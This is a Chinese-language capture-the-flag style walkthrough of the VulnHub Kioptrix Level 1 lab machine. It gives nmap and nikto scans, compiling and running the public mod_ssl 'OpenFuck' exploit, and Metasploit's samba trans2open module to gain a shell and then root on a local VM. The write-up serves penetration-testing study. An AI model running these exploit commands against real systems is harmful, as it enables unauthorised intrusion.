OSCP难度靶机之Kioptrix Level 1(#1)

admin 2022年4月1日10:39:26评论78 views字数 853阅读2分50秒阅读模式

虚拟机信息:

虚拟机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

虚拟机简介:游戏的目的是通过任何可能的方式获取root用户访问权限

目标:1个flag

级别:初级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.1.0/24

OSCP难度靶机之Kioptrix Level 1(#1)

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.1.6

查看开放22、80、111、139、443端口

OSCP难度靶机之Kioptrix Level 1(#1)

2、渗透测试

2.1 HTTP渗透测试

1.访问站点

OSCP难度靶机之Kioptrix Level 1(#1)

2.查看网页源代码

OSCP难度靶机之Kioptrix Level 1(#1)

3.使用nikto测试站点

nikto -host http://192.168.1.6

存在CVE漏洞

OSCP难度靶机之Kioptrix Level 1(#1)

2.2 漏洞利用方式1

1.查看存在mod_ssl漏洞

searchsploit mod_ssl

OSCP难度靶机之Kioptrix Level 1(#1)

2.利用漏洞脚本

cp /usr/share/exploitdb/exploits/unix/remote/47080.c .
apt install libssl-dev
gcc -o OpenFuck 47080.c -lcrypto

OSCP难度靶机之Kioptrix Level 1(#1)

3.查看文件权限并执行

chmod 777 OpenFuck
./OpenFuck

OSCP难度靶机之Kioptrix Level 1(#1)

4.基于Apache版本

OSCP难度靶机之Kioptrix Level 1(#1)

OSCP难度靶机之Kioptrix Level 1(#1)

5.漏洞利用

./OpenFuck 0x6b 192.168.1.6 443 -c 40

获取到shell权限

OSCP难度靶机之Kioptrix Level 1(#1)

6.获取到shell权限

由于需要联网下载库文件,网络不通只获取到Apache权限

OSCP难度靶机之Kioptrix Level 1(#1)

2.3 漏洞利用方式2

1.查看smb版本

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.1.6
run

OSCP难度靶机之Kioptrix Level 1(#1)

2.查找smb漏洞

提示有trans2open漏洞

OSCP难度靶机之Kioptrix Level 1(#1)

3.使用msf漏洞利用

use exploit/linux/samba/trans2open
set rhosts 192.168.1.6
set target 0
run

OSCP难度靶机之Kioptrix Level 1(#1)

获取到shell会话

OSCP难度靶机之Kioptrix Level 1(#1)

4.连接shell会话

OSCP难度靶机之Kioptrix Level 1(#1)

已经获取到root权限

OSCP难度靶机之Kioptrix Level 1(#1)

原文始发于微信公众号(安全孺子牛):OSCP难度靶机之Kioptrix Level 1(#1)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月1日10:39:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP难度靶机之Kioptrix Level 1(#1)https://cn-sec.com/archives/857729.html

发表评论

匿名网友 填写信息